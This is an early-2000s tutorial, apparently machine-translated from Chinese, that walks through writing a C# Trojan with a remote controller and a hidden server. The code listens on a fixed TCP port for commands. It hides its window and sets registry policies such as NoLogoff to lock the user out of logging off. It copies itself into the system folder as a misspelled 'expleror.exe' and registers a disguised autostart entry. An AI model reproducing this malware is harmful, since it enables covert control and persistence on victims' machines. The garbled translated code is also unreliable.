I wrote a process about using C # Trojans (before the program see it), I am sorry that I haven't written analysis, let everyone have grown, now I will make up :).
Preface:
My technology is not very good, if you are to learn Troja technology, there is no inspiration, this article In order to give friends to learn C #.
Trojan's introduction: (refer to the Hummer Principles of the Essence of the Habitat 2000-2001]
Because this program is a Trojan, there is a basic knowledge of some Trojans before introducing prior instructions, as it will mention these contents in many places. A complete Troist system consists of a hardware portion, a software portion, and a specific connection part. Here mainly introduces the software part, it mainly has a controller program, Trojan (background service), and Trojan formulation. The control end is used to remotely control the server's program; the Trojan is the program that sneaked into the server. The Trojan formulation is the port number, trigger condition, Trojan name, etc., which set the Trojan. More hidden programs.
Use technology:
The control terminal program sends a control code control server, the server background operation, and the purpose of modify the registration expression. Technology is not very difficult, mainly reflects the modification of the network programming and registry of C #.
Control terminal development:
The control terminal issues a control code to the server, after receiving the control code, complete the designated requirements based on the control requirements, if the server completes the job, return successful information.
Development of the control end:
The setting of the control code You can set itself, do not need to be detailed, there are several difficulties.
1 connection request
Use the system.net.sockets.tcpclient class in the .NET class.
TcpClient (String Hostname, INT Port)
Hostname is the host name to be controlled, of course, you can also use the IP address.
Port is a port.
// System.EventArgs contains base classes for event data classes
Private void button7_click (Object Sender, System.Eventargs E)
{
// Record operation, add operation information in the RichTextBox control
RichtextBox1.AppendText ("Request Connection" TextBox1.Text "/ R");
INT port = 6678;
Try
{
// Initialize the new instance of the TCPCLIENT class and connect to the specified port on the specified host
Client = New TcpClient (TextBox1.text, port);
}
Catch
{
Messagebox.show ("server is not online! Determine if you enter the host name.");
RichtextBox1.AppendText ("Server is not online! Determine if you enter the host name.");
}
} // Private Void Buttion
2 The test is connected to the controlled machine. The process of the program is to send the control code to see if the control terminal has a reaction. If there is a return, the control is successful.
/ / Provide data streams from network access
// Private networkStream Stream;
code show as below:
Private void button8_click (Object Sender, System.EventArgs E)
{
// Record operation
RichtextBox1.AppendText ("Test Connection" "/ R");
Try
{
stream = client.getStream ();
IF (stream.canwrite)
{
// Send a control code
String Control = "jiance";
Byte [] by = system.text.Encoding.ascii.getbytes (control.tocharRay ())
Street.write (by, 0, by.length);
// Next time
stream.flush ();
// Start the thread that receives the reversal data
// Receive is a function of thread execution, see later analysis
ThreadReceive = New Thread (New ThreadStart (Receive));
ThreadRecEive.start ();
}
}
Catch (Exception EE)
{
RichtextBox1.AppendText (Ee.Message "/ R");
Messagebox.show (Ee.Message);
}
}
3 code control the effectiveness
Private void button9_click (Object Sender, System.Eventargs E)
{
/ / Here is the control code to be sent, Radiobutton is the form control
IF (radiobutton1.checked) {control = form2.zhucex;}
Else if (Radiobutton2.checked) {Control = form3.zhuces;
Else if (radiobutton3.checked) {control = Warring;
Else if (radiobutton4.checked) {control = suggest;}
Else if (radiobutton5.checked) {control = form4.mumawe;}
Else if (Radiobutton6.Checked) {Control = Drop;}
IF (Control == "000000)
{
Messagebox.show ("You don't enter any control target! Do not send control signals");
RichtextBox1.AppendText ("You don't enter any control target! Do not send control signal");
}
Else IF (Control! = "000000")
{
Try
{
// Record operation
RichtextBox1.AppendText (Control "is trying to control, waiting for response ..." "/ r");
stream = client.getStream ();
IF (stream.canwrite)
{
Byte [] by = system.text.Encoding.ascii.getbytes (control.tocharRay ())
Street.write (by, 0, by.length);
stream.flush ();
ThreadReceive = New Thread (New ThreadStart (Receive));
ThreadRecEive.start ();
} // Endif
} // Try
Catch
{
RichtextBox1.AppendText ("Server is not connected 1 control is not valid!" "/ r");
Messagebox.show ("Server is not connected 1 control is not valid!" "/ R");
}
} // Else IF
}
4 thread execution function
Private void receive ()
{
/ / Set the space to read the data
Byte [] bb = new byte [3];
// Read 3 bytes, i is the number of bytes that actually read
INT i = stream.read (bb, 0, 3); // Convert to string, if it is the Chinese control code, use string ss = //system.text.Encoding.unicode.getstring (BB);
String ss = system.text.Encoding.ascii.getstring (bb);
// hjc The return code HJC of the server I set is successful, HKZ is successful
IF (ss == "hjc")
{
Messagebox.show ("Connection Success");
RichtextBox1.AppendText ("Connection Success");
}
IF (ss == "hkz")
{
RichtextBox1.AppendText (Control "Control Success" "/ R");
Messagebox.show (Control "Control Success" "/ R");
}
}
Service development:
To achieve the procedure of Trojan service, it is mainly to achieve the following functions: the operation of the background (hidden technology), the reception of the control code and the modification of the registry, the following introduction to these three aspects:
1. In VC #, establish a background service program is very easy, build a new C # Windows application, project name is self-defined (but to hide the names and system-like names), the form property "showintaskbar" The property is set to false, let it run in the taskbar when running, and set the attribute "WindowState" property to MININIZED, so that the form can be hidden. Of course, you can also set up in InitializationComponent (), this function is initialized, running before the form is displayed, the code is as follows:
Private vidinitiRizeComponent ()
{
//
// Form1
//
// Form display starting point and size
THIS.AUTOSCALEBASESIZE = New System.drawing.size (6, 14);
THIS.CLIENTSIZE = New System.drawing.size (368, 357);
// Form name
THIS.NAME = "Form1";
/ / Set the property to make it run in the background
THIS.SHOWINTASKBAR = FALSE;
THIS.TEXT = "Form1";
This.WindowsTate = system.windows.forms.formwindowstate.minimized;
}
2. The reception of the control code must be started at the start of the server running, so the listening thread must start in the initialization of the program, so put it in the form of constructor, the code annotation is as follows:
Public Form1 () // Form constructor
{
//
// Windows Form Designer Support
//
InitializationComponent ();
//
// Todo: Add any constructor code after INITIALIZECOMPONENT call
// Add your listening code
// Port You can be set, I use a fixed port
INT port = 6678;
//System.net.sockets.tcplistener is used to listen to the client in the TCP network
Listener = New TCPListener (port);
// Start listening
Listener.Start (); // Increase the thread of the received control code, if you want to stop the thread can be used with thread.abort ()
// recontrolcode is a function of thread start execution, which is controlled according to the received control
// Control code Select the appropriate registry modification function
Thread thread = New Thread (New ThreadStart (Recontrolcode));
Thread.start ();
}
The recontrolcode function is as follows, the full code is seen
Private void recontrolcode ()
{
/ / Set the receiving socket, receive listener.acceptsocket is the request to return the customer already received
Socket = listener.acceptsocket ();
/ / If the connection is successful
While (socket.connected)
{
// Receive control code
Byte [] by = new byte [6];
INT i = socket.receive (by, by.length, 0);
String ss = system.text.Encoding.ascii.getstring (by);
/ / Perform different functions according to the control code
// Modify the registry to join the encoding
Switch (SS)
{
Case "jiance": // Test connection, return to test information
String str = "hjc";
Byte [] bytee = system.text.Encoding.ascii.getbytes (STR);
Socket.send (Bytee, 0, Bytee.Length, 0);
Break;
Case "ZX1000":
/ / Modify the registry function, self-defined, see the following analysis
Unlogoff ();
// Return to the control message
RetMessage ();
Break;
Case "ZX0100":
// Modify the registry function
Unclose ();
// Return to the control message
RetMessage ();
Break;
// Repeated Case function is the same as front, slightly
DEFAULT:
Break;
} // case
} // while
} // private void recontrolcode
3. In the C # implementation of the registry, use the system.microsoft.win32 command space in the .NET class library, which provides two types of classes: Processing the class that caused by the operating system and the class for the system registry. . Below you can see its usage. Here I have made a subroutine that modifies the registry: make the computer can't log out. Before this, you can understand the registry, in the sub-key Software // Microsoft // Windows // CurrentVersion // Policies // Explorer
The key value nologoff is set to 1 to make the computer cannot be logged out. In the following functions, use C # to implement the modification of the registry:
PRIVATE VOID UNLOGOFF ()
{
/ / Get the top node of the registry of the host
Microsoft.win32.registryKey rlocal = registry.localmachine;
/ / Set a variable of a registry subkey
RegistryKey Key1;
Try
{
// Function RegistryKey.opensubKey (String RegistryKey, Bool CanWrite) Retrieves the specified subkey
// RegistryKey is the key value specified by the user, and canwrite can modify it for True. The default is that Fasle is not changed
Key1 =
Rlocal.opensubKey ("Software // Microsoft // Windows // CurrentVersion // POLICIES // Explorer", True);
/ / Set the key name, and value of the subkey
Key1.SetValue ("NOLOGOFF", 1);
// Close the open subkey
Key1.Close ();
// Warning string settings
MyStr = mystr "HKEY_LOCAL_MACHINE // Software // Microsoft // Windows // CurrentVersion // Policies // Explorer key value NOLOGOFF is modified! Please set it to 0!";
}
Catch {}
// If there is no self-established
IF (Key1 == Null)
{
Try
{
// Use the registryKey.createSubKey (String MyString) function to create the child you want
RegistryKey Key2 = rlocal.createSubkey ("Software // Microsoft // Windows // CurrentVersion // Policies // Explorer");
Key2.SetValue ("NOLOGOFF", 1);
Key2.Close ();
MyStr = mystr "HKEY_LOCAL_MACHINE // Software // Microsoft // Windows // CurrentVersion // Policies // Explorer key value NOLOGOFF is modified! Please set it to 0!";
}
Catch {}
}
}
4. There is an important function in the Trojan program to be self-replication and transfer. Trojans must automatically hide Trojans in SYSTEM, SYSTEM32, to prevent discovery. The transfer code analysis is as follows, the functionality of the main implementation is to transfer the Trojans under the D to C: //winnnt//system/Msdoss.exe, and the name is changed. Used .NET namespace system.io, its role is to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System.IO.File class.
Private void movec1 ()
{
Try
{
// Function File.Move (String SourceFileName) The role of mobile files
// sourceFileName is the new path for the file name to move, DestfileName
File.move ("c: //winnnt//system/Msdoss.exe", "D: //winnt//system32//expleror.exe");
}
Catch {}
// Set the newly moving Trojan to self-start. Analysis and front
Try
{
Key1 = rlocal.opensubKey ("Software // Microsoft // Windows // CurrentVersion // Run", true);
Key1.SetValue ("MicrosoftT", "D: //winnt//system32//expleror.exe");
Key1.Close ();
}
Catch {}
IF (Key1 == Null)
{
Try
{
RegistryKey Key2 = rlocal.createSubkey ("Software // Microsoft // Windows // CurrentVersion // Run");
Key1.SetValue ("MicrosoftT", "D: //winnt//system32//expleror.exe");
Key1.Close ();
}
Catch {}
}
} // movec1 ()
To the Trojan of a simple C # here, if you have any questions, please go to the C # of the www.vchelp.net forum or .NET layout and I discuss, or send me chenweijun_sh@tang.com, of course you can Contact black defense. Deciduous summer day
2002-07-29
